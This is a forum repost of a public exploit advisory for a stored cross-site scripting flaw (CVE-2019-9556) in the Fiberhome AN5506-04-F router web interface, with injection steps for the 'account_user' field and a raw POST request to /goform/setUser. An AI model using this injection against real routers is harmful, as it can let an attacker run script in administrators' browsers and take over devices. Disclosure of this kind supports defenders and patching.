Jump to content

Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting


Recommended Posts

  • Group:  Members
  • Content Count:  413
  • Achievement Points:  2,540
  • With Us For:  138 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows

# Exploit Title: Fiberhome AN5506-04-F  - Stored Cross Site Scripting
# Date: 04.03.2019
# Exploit Author: Tauco
# Vendor Homepage:  http://www.fiberhomegroup.com/en/
# Version:  RP2669
# Tested on: Windows 10
# CVE :  CVE-2019-9556


Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application.


Proof of concept : 

1. Login with credential
2. Go to Management
3. Open User Account
4. Add user
5. Inject the post parameter "account_user"
6. Encode Url <script>alert("XSS")</script>

POST /goform/setUser HTTP/1.1
Content-Length: 101
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: loginName=admin
Connection: close

Link to comment
Share on other sites

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...